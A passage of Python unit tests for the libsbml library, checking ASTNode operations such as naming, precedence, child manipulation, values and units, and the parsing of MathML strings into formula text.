self.assert_(( "false" == n.getName() ))
n.setType(libsbml.AST_CONSTANT_PI)
self.assert_(( "pi" == n.getName() ))
n.setType(libsbml.AST_CONSTANT_TRUE)
self.assert_(( "true" == n.getName() ))
n.setType(libsbml.AST_LAMBDA)
self.assert_(( "lambda" == n.getName() ))
n.setType(libsbml.AST_FUNCTION)
n.setName( "f")
self.assert_(( "f" == n.getName() ))
n.setType(libsbml.AST_FUNCTION_DELAY)
self.assert_(( "f" == n.getName() ))
n.setName(None)
self.assert_(( "delay" == n.getName() ))
n.setType(libsbml.AST_FUNCTION)
self.assert_( n.getName() == None )
n.setType(libsbml.AST_FUNCTION_ABS)
self.assert_(( "abs" == n.getName() ))
n.setType(libsbml.AST_FUNCTION_ARCCOS)
self.assert_(( "arccos" == n.getName() ))
n.setType(libsbml.AST_FUNCTION_TAN)
self.assert_(( "tan" == n.getName() ))
n.setType(libsbml.AST_FUNCTION_TANH)
self.assert_(( "tanh" == n.getName() ))
n.setType(libsbml.AST_LOGICAL_AND)
self.assert_(( "and" == n.getName() ))
n.setType(libsbml.AST_LOGICAL_NOT)
self.assert_(( "not" == n.getName() ))
n.setType(libsbml.AST_LOGICAL_OR)
self.assert_(( "or" == n.getName() ))
n.setType(libsbml.AST_LOGICAL_XOR)
self.assert_(( "xor" == n.getName() ))
n.setType(libsbml.AST_RELATIONAL_EQ)
self.assert_(( "eq" == n.getName() ))
n.setType(libsbml.AST_RELATIONAL_GEQ)
self.assert_(( "geq" == n.getName() ))
n.setType(libsbml.AST_RELATIONAL_LT)
self.assert_(( "lt" == n.getName() ))
n.setType(libsbml.AST_RELATIONAL_NEQ)
self.assert_(( "neq" == n.getName() ))
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_getPrecedence(self):
n = libsbml.ASTNode()
n.setType(libsbml.AST_PLUS)
self.assert_( n.getPrecedence() == 2 )
n.setType(libsbml.AST_MINUS)
self.assert_( n.getPrecedence() == 2 )
n.setType(libsbml.AST_TIMES)
self.assert_( n.getPrecedence() == 3 )
n.setType(libsbml.AST_DIVIDE)
self.assert_( n.getPrecedence() == 3 )
n.setType(libsbml.AST_POWER)
self.assert_( n.getPrecedence() == 4 )
n.setType(libsbml.AST_MINUS)
n.addChild(libsbml.ASTNode(libsbml.AST_NAME))
self.assert_( n.isUMinus() == True )
self.assert_( n.getPrecedence() == 5 )
n.setType(libsbml.AST_NAME)
self.assert_( n.getPrecedence() == 6 )
n.setType(libsbml.AST_FUNCTION)
self.assert_( n.getPrecedence() == 6 )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_getReal(self):
n = libsbml.ASTNode()
n.setType(libsbml.AST_REAL)
n.setValue(1.6)
self.assert_( n.getReal() == 1.6 )
n.setType(libsbml.AST_REAL_E)
n.setValue(12.3,3)
val = abs(n.getReal() - 12300.0)
self.assert_( val < DBL_EPSILON )
n.setType(libsbml.AST_RATIONAL)
n.setValue(1,2)
self.assert_( n.getReal() == 0.5 )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_insertChild(self):
node = libsbml.ASTNode()
c1 = libsbml.ASTNode()
c2 = libsbml.ASTNode()
c3 = libsbml.ASTNode()
newc = libsbml.ASTNode()
newc1 = libsbml.ASTNode()
i = 0
node.setType(libsbml.AST_LOGICAL_AND)
c1.setName( "a")
c2.setName( "b")
c3.setName( "c")
node.addChild(c1)
node.addChild(c2)
node.addChild(c3)
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(a, b, c)" == libsbml.formulaToString(node) ))
newc.setName( "d")
newc1.setName( "e")
i = node.insertChild(1,newc)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 4 )
self.assert_(( "and(a, d, b, c)" == libsbml.formulaToString(node) ))
i = node.insertChild(5,newc)
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
self.assert_( node.getNumChildren() == 4 )
self.assert_(( "and(a, d, b, c)" == libsbml.formulaToString(node) ))
i = node.insertChild(2,newc1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 5 )
self.assert_(( "and(a, d, e, b, c)" == libsbml.formulaToString(node) ))
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_isLog10(self):
n = libsbml.ASTNode()
n.setType(libsbml.AST_FUNCTION)
self.assert_( n.isLog10() == False )
n.setType(libsbml.AST_FUNCTION_LOG)
self.assert_( n.isLog10() == False )
c = libsbml.ASTNode()
n.addChild(c)
c.setValue(10)
self.assert_( n.isLog10() == False )
n.addChild(libsbml.ASTNode())
self.assert_( n.isLog10() == True )
c.setValue(2)
self.assert_( n.isLog10() == False )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_isSqrt(self):
n = libsbml.ASTNode()
n.setType(libsbml.AST_FUNCTION)
self.assert_( n.isSqrt() == False )
n.setType(libsbml.AST_FUNCTION_ROOT)
self.assert_( n.isSqrt() == False )
c = libsbml.ASTNode()
n.addChild(c)
c.setValue(2)
self.assert_( n.isSqrt() == False )
n.addChild(libsbml.ASTNode())
self.assert_( n.isSqrt() == True )
c.setValue(3)
self.assert_( n.isSqrt() == False )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_isUMinus(self):
n = libsbml.ASTNode()
n.setType(libsbml.AST_MINUS)
self.assert_( n.isUMinus() == False )
n.addChild(libsbml.ASTNode(libsbml.AST_NAME))
self.assert_( n.isUMinus() == True )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_no_children(self):
node = libsbml.ASTNode()
self.assert_( node.getNumChildren() == 0 )
self.assert_( node.getLeftChild() == None )
self.assert_( node.getRightChild() == None )
self.assert_( node.getChild(0) == None )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_one_child(self):
node = libsbml.ASTNode()
child = libsbml.ASTNode()
node.addChild(child)
self.assert_( node.getNumChildren() == 1 )
self.assert_( node.getLeftChild() == child )
self.assert_( node.getRightChild() == None )
self.assert_( node.getChild(0) == child )
self.assert_( node.getChild(1) == None )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_prependChild1(self):
node = libsbml.ASTNode()
c1 = libsbml.ASTNode()
c2 = libsbml.ASTNode()
c1_1 = libsbml.ASTNode()
i = 0
node.setType(libsbml.AST_LOGICAL_AND)
c1.setName( "a")
c2.setName( "b")
node.addChild(c1)
node.addChild(c2)
self.assert_( node.getNumChildren() == 2 )
self.assert_(( "and(a, b)" == libsbml.formulaToString(node) ))
c1_1.setName( "d")
i = node.prependChild(c1_1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(d, a, b)" == libsbml.formulaToString(node) ))
self.assert_(( "d" == node.getChild(0).getName() ))
self.assert_(( "a" == node.getChild(1).getName() ))
self.assert_(( "b" == node.getChild(2).getName() ))
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_removeChild(self):
node = libsbml.ASTNode()
c1 = libsbml.ASTNode()
c2 = libsbml.ASTNode()
i = 0
node.setType(libsbml.AST_PLUS)
c1.setName( "foo")
c2.setName( "foo2")
node.addChild(c1)
node.addChild(c2)
self.assert_( node.getNumChildren() == 2 )
i = node.removeChild(0)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 1 )
i = node.removeChild(1)
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
self.assert_( node.getNumChildren() == 1 )
i = node.removeChild(0)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 0 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_replaceChild(self):
node = libsbml.ASTNode()
c1 = libsbml.ASTNode()
c2 = libsbml.ASTNode()
c3 = libsbml.ASTNode()
newc = libsbml.ASTNode()
i = 0
node.setType(libsbml.AST_LOGICAL_AND)
c1.setName( "a")
c2.setName( "b")
c3.setName( "c")
node.addChild(c1)
node.addChild(c2)
node.addChild(c3)
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(a, b, c)" == libsbml.formulaToString(node) ))
newc.setName( "d")
i = node.replaceChild(0,newc)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(d, b, c)" == libsbml.formulaToString(node) ))
i = node.replaceChild(3,newc)
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(d, b, c)" == libsbml.formulaToString(node) ))
i = node.replaceChild(1,c1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(d, a, c)" == libsbml.formulaToString(node) ))
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_setCharacter(self):
node = libsbml.ASTNode()
node.setName( "foo")
self.assert_( node.getType() == libsbml.AST_NAME )
self.assert_( node.getCharacter() == "\0" )
self.assert_(( "foo" == node.getName() ))
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setCharacter( '+')
self.assert_( node.getType() == libsbml.AST_PLUS )
self.assert_( node.getCharacter() == '+' )
self.assert_( node.getName() == None )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setCharacter( '-')
self.assert_( node.getType() == libsbml.AST_MINUS )
self.assert_( node.getCharacter() == '-' )
self.assert_( node.getName() == None )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setCharacter( '*')
self.assert_( node.getType() == libsbml.AST_TIMES )
self.assert_( node.getCharacter() == '*' )
self.assert_( node.getName() == None )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setCharacter( '/')
self.assert_( node.getType() == libsbml.AST_DIVIDE )
self.assert_( node.getCharacter() == '/' )
self.assert_( node.getName() == None )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setCharacter( '^')
self.assert_( node.getType() == libsbml.AST_POWER )
self.assert_( node.getCharacter() == '^' )
self.assert_( node.getName() == None )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setCharacter( '$')
self.assert_( node.getType() == libsbml.AST_UNKNOWN )
self.assert_( node.getCharacter() == '$' )
self.assert_( node.getName() == None )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_setInteger(self):
node = libsbml.ASTNode()
node.setName( "foo")
self.assert_( node.getType() == libsbml.AST_NAME )
self.assert_(( "foo" == node.getName() ))
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setValue(3.2)
self.assert_( node.getType() == libsbml.AST_REAL )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getName() == None )
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getReal() == 3.2 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setValue(321)
self.assert_( node.getType() == libsbml.AST_INTEGER )
self.assert_( node.getInteger() == 321 )
self.assert_( node.getName() == None )
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_setName(self):
name = "foo";
node = libsbml.ASTNode()
self.assert_( node.getType() == libsbml.AST_UNKNOWN )
node.setName(name)
self.assert_( node.getType() == libsbml.AST_NAME )
self.assert_(( name == node.getName() ))
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
if (node.getName() == name):
pass
node.setName(None)
self.assert_( node.getType() == libsbml.AST_NAME )
if (node.getName() != None):
pass
node.setType(libsbml.AST_FUNCTION_COS)
self.assert_( node.getType() == libsbml.AST_FUNCTION_COS )
self.assert_(( "cos" == node.getName() ))
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setType(libsbml.AST_PLUS)
node.setName(name)
self.assert_( node.getType() == libsbml.AST_NAME )
self.assert_(( name == node.getName() ))
self.assert_( node.getCharacter() == '+' )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_setName_override(self):
node = libsbml.ASTNode(libsbml.AST_FUNCTION_SIN)
self.assert_(( "sin" == node.getName() ))
self.assert_( node.getType() == libsbml.AST_FUNCTION_SIN )
node.setName( "MySinFunc")
self.assert_(( "MySinFunc" == node.getName() ))
self.assert_( node.getType() == libsbml.AST_FUNCTION_SIN )
node.setName(None)
self.assert_(( "sin" == node.getName() ))
self.assert_( node.getType() == libsbml.AST_FUNCTION_SIN )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_setReal(self):
node = libsbml.ASTNode()
node.setName( "foo")
self.assert_( node.getType() == libsbml.AST_NAME )
node.setValue(32.1)
self.assert_( node.getType() == libsbml.AST_REAL )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getName() == None )
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getReal() == 32.1 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
self.assert_( node.getMantissa() == 32.1 )
node.setValue(45,90)
self.assert_( node.getType() == libsbml.AST_RATIONAL )
self.assert_( node.getInteger() == 45 )
self.assert_( node.getName() == None )
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getReal() == 0.5 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 90 )
self.assert_( node.getMantissa() == 0 )
node.setValue(32.0,4)
self.assert_( node.getType() == libsbml.AST_REAL_E )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getName() == None )
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getReal() == 320000 )
self.assert_( node.getExponent() == 4 )
self.assert_( node.getDenominator() == 1 )
self.assert_( node.getMantissa() == 32 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_setType(self):
node = libsbml.ASTNode()
node.setName( "foo")
self.assert_( node.getType() == libsbml.AST_NAME )
node.setType(libsbml.AST_FUNCTION)
self.assert_( node.getType() == libsbml.AST_FUNCTION )
self.assert_(( "foo" == node.getName() ))
node.setType(libsbml.AST_NAME)
self.assert_( node.getType() == libsbml.AST_NAME )
self.assert_(( "foo" == node.getName() ))
node.setType(libsbml.AST_INTEGER)
self.assert_( node.getType() == libsbml.AST_INTEGER )
node.setType(libsbml.AST_REAL)
self.assert_( node.getType() == libsbml.AST_REAL )
node.setType(libsbml.AST_UNKNOWN)
self.assert_( node.getType() == libsbml.AST_UNKNOWN )
node.setType(libsbml.AST_PLUS)
self.assert_( node.getType() == libsbml.AST_PLUS )
self.assert_( node.getCharacter() == '+' )
node.setType(libsbml.AST_MINUS)
self.assert_( node.getType() == libsbml.AST_MINUS )
self.assert_( node.getCharacter() == '-' )
node.setType(libsbml.AST_TIMES)
self.assert_( node.getType() == libsbml.AST_TIMES )
self.assert_( node.getCharacter() == '*' )
node.setType(libsbml.AST_DIVIDE)
self.assert_( node.getType() == libsbml.AST_DIVIDE )
self.assert_( node.getCharacter() == '/' )
node.setType(libsbml.AST_POWER)
self.assert_( node.getType() == libsbml.AST_POWER )
self.assert_( node.getCharacter() == '^' )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_swapChildren(self):
node = libsbml.ASTNode()
c1 = libsbml.ASTNode()
c2 = libsbml.ASTNode()
node_1 = libsbml.ASTNode()
c1_1 = libsbml.ASTNode()
c2_1 = libsbml.ASTNode()
i = 0
node.setType(libsbml.AST_LOGICAL_AND)
c1.setName( "a")
c2.setName( "b")
node.addChild(c1)
node.addChild(c2)
self.assert_( node.getNumChildren() == 2 )
self.assert_(( "and(a, b)" == libsbml.formulaToString(node) ))
node_1.setType(libsbml.AST_LOGICAL_AND)
c1_1.setName( "d")
c2_1.setName( "f")
node_1.addChild(c1_1)
node_1.addChild(c2_1)
self.assert_( node_1.getNumChildren() == 2 )
self.assert_(( "and(d, f)" == libsbml.formulaToString(node_1) ))
i = node.swapChildren(node_1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 2 )
self.assert_(( "and(d, f)" == libsbml.formulaToString(node) ))
self.assert_( node_1.getNumChildren() == 2 )
self.assert_(( "and(a, b)" == libsbml.formulaToString(node_1) ))
_dummyList = [ node_1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_units(self):
n = libsbml.ASTNode()
n.setType(libsbml.AST_REAL)
n.setValue(1.6)
i = n.setUnits( "mole")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( n.isSetUnits() == True )
self.assert_(( "mole" == n.getUnits() ))
i = n.unsetUnits()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( n.isSetUnits() == False )
self.assert_(( "" == n.getUnits() ))
i = n.setUnits( "1mole")
self.assert_( i == libsbml.LIBSBML_INVALID_ATTRIBUTE_VALUE )
self.assert_( n.isSetUnits() == False )
n.setType(libsbml.AST_FUNCTION)
i = n.setUnits( "mole")
self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE )
self.assert_( n.isSetUnits() == False )
self.assert_(( "" == n.getUnits() ))
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestASTNode))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/math/TestReadMathML.py
```python
import sys
import unittest
import libsbml
def util_isInf(*x):
return ( (x[0] == util_PosInf()) or (x[0] == util_NegInf()) )
def util_NaN():
z = 1e300
z = z * z
return z - z
def util_PosInf():
z = 1e300
z = z * z
return z
def util_NegInf():
z = 1e300
z = z * z
return -z
def wrapString(s):
return s
pass
def MATHML_FOOTER():
return "</math>"
pass
def MATHML_HEADER():
return "<math xmlns='http://www.w3.org/1998/Math/MathML'>\n"
pass
def MATHML_HEADER_UNITS():
return "<math xmlns='http://www.w3.org/1998/Math/MathML'\n"
pass
def MATHML_HEADER_UNITS2():
return " xmlns:sbml='http://www.sbml.org/sbml/level3/version1/core'>\n"
pass
def XML_HEADER():
return "<?xml version='1.0' encoding='UTF-8'?>\n"
pass
def isnan(x):
return (x != x)
pass
def wrapMathML(s):
r = XML_HEADER()
r += MATHML_HEADER()
r += s
r += MATHML_FOOTER()
return r
pass
def wrapMathMLUnits(s):
r = XML_HEADER()
r += MATHML_HEADER_UNITS()
r += MATHML_HEADER_UNITS2()
r += s
r += MATHML_FOOTER()
return r
pass
def wrapXML(s):
r = XML_HEADER()
r += s
return r
pass
class TestReadMathML(unittest.TestCase):
global F
F = None
global N
N = None
def setUp(self):
self.N = None
self.F = None
pass
def tearDown(self):
self.N = None
self.F = None
pass
def test_element_abs(self):
s = wrapMathML("<apply><abs/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "abs(x)" == self.F ))
pass
def test_element_and(self):
s = wrapMathML("<apply> <and/> <ci>a</ci> <ci>b</ci> <ci>c</ci> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "and(a, b, c)" == self.F ))
pass
def test_element_arccos(self):
s = wrapMathML("<apply><arccos/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "acos(x)" == self.F ))
pass
def test_element_arccosh(self):
s = wrapMathML("<apply><arccosh/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arccosh(x)" == self.F ))
pass
def test_element_arccot(self):
s = wrapMathML("<apply><arccot/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arccot(x)" == self.F ))
pass
def test_element_arccoth(self):
s = wrapMathML("<apply><arccoth/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arccoth(x)" == self.F ))
pass
def test_element_arccsc(self):
s = wrapMathML("<apply><arccsc/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arccsc(x)" == self.F ))
pass
def test_element_arccsch(self):
s = wrapMathML("<apply><arccsch/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arccsch(x)" == self.F ))
pass
def test_element_arcsec(self):
s = wrapMathML("<apply><arcsec/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arcsec(x)" == self.F ))
pass
def test_element_arcsech(self):
s = wrapMathML("<apply><arcsech/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arcsech(x)" == self.F ))
pass
def test_element_arcsin(self):
s = wrapMathML("<apply><arcsin/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "asin(x)" == self.F ))
pass
def test_element_arcsinh(self):
s = wrapMathML("<apply><arcsinh/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arcsinh(x)" == self.F ))
pass
def test_element_arctan(self):
s = wrapMathML("<apply><arctan/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "atan(x)" == self.F ))
pass
def test_element_arctanh(self):
s = wrapMathML("<apply><arctanh/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arctanh(x)" == self.F ))
pass
def test_element_bug_apply_ci_1(self):
s = wrapMathML("<apply>" +
" <ci> Y </ci>" +
" <cn> 1 </cn>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_FUNCTION )
self.assert_(( "Y" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 1 )
c = self.N.getLeftChild()
self.assert_( c != None )
self.assert_( c.getType() == libsbml.AST_REAL )
self.assert_( c.getReal() == 1 )
self.assert_( c.getNumChildren() == 0 )
pass
def test_element_bug_apply_ci_2(self):
s = wrapMathML("<apply>" +
" <ci> Y </ci>" +
" <csymbol encoding='text' " +
" definitionURL='http://www.sbml.org/sbml/symbols/time'> t </csymbol>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_FUNCTION )
self.assert_(( "Y" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 1 )
c = self.N.getLeftChild()
self.assert_( c != None )
self.assert_( c.getType() == libsbml.AST_NAME_TIME )
self.assert_(( "t" == c.getName() ))
self.assert_( c.getNumChildren() == 0 )
pass
def test_element_bug_cn_e_notation_1(self):
s = wrapMathML("<cn type='e-notation'> 2 <sep/> -8 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL_E )
self.assert_( self.N.getMantissa() == 2.0 )
self.assert_( self.N.getExponent() == -8.0 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_bug_cn_e_notation_2(self):
s = wrapMathML("<cn type='e-notation'> -3 <sep/> 4 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL_E )
self.assert_( self.N.getMantissa() == -3.0 )
self.assert_( self.N.getExponent() == 4.0 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_bug_cn_e_notation_3(self):
s = wrapMathML("<cn type='e-notation'> -6 <sep/> -1 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL_E )
self.assert_( self.N.getMantissa() == -6.0 )
self.assert_( self.N.getExponent() == -1.0 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_bug_cn_integer_negative(self):
s = wrapMathML("<cn type='integer'> -7 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_INTEGER )
self.assert_( self.N.getInteger() == -7 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_bug_csymbol_1(self):
s = wrapMathML("<apply>" +
" <gt/>" +
" <csymbol encoding='text' " +
" definitionURL='http://www.sbml.org/sbml/symbols/time'>time</csymbol>" +
" <cn>5000</cn>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_RELATIONAL_GT )
self.assert_( self.N.getNumChildren() == 2 )
c = self.N.getLeftChild()
self.assert_( c != None )
self.assert_( c.getType() == libsbml.AST_NAME_TIME )
self.assert_(( "time" == c.getName() ))
self.assert_( c.getNumChildren() == 0 )
c = self.N.getRightChild()
self.assert_( c != None )
self.assert_( c.getType() == libsbml.AST_REAL )
self.assert_( c.getReal() == 5000 )
self.assert_( c.getNumChildren() == 0 )
pass
def test_element_bug_csymbol_delay_1(self):
s = wrapMathML("<apply>" +
" <csymbol encoding='text' definitionURL='http://www.sbml.org/sbml/" +
"symbols/delay'> my_delay </csymbol>" +
" <ci> x </ci>" +
" <cn> 0.1 </cn>" +
"</apply>\n")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_FUNCTION_DELAY )
self.assert_(( "my_delay" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 2 )
c = self.N.getLeftChild()
self.assert_( c != None )
self.assert_( c.getType() == libsbml.AST_NAME )
self.assert_(( "x" == c.getName() ))
self.assert_( c.getNumChildren() == 0 )
c = self.N.getRightChild()
self.assert_( c != None )
self.assert_( c.getType() == libsbml.AST_REAL )
self.assert_( c.getReal() == 0.1 )
self.assert_( c.getNumChildren() == 0 )
pass
def test_element_bug_math_xmlns(self):
s = wrapXML("<foo:math xmlns:foo='http://www.w3.org/1998/Math/MathML'>" +
" <foo:apply>" +
" <foo:plus/> <foo:cn>1</foo:cn> <foo:cn>2</foo:cn>" +
" </foo:apply>" +
"</foo:math>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "1 + 2" == self.F ))
pass
def test_element_ceiling(self):
s = wrapMathML("<apply><ceiling/><cn> 1.6 </cn></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "ceil(1.6)" == self.F ))
pass
def test_element_ci(self):
s = wrapMathML("<ci> x </ci>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_NAME )
self.assert_(( "x" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_ci_definitionURL(self):
s = wrapMathML("<ci definitionURL=\"foobar\"> x </ci>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_NAME )
self.assert_(( "x" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 0 )
self.assert_( self.N.getDefinitionURL().getValue(0) == "foobar" )
pass
def test_element_ci_surrounding_spaces_bug(self):
s = wrapMathML(" <ci> s </ci> ")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_NAME )
self.assert_(( "s" == self.N.getName() ))
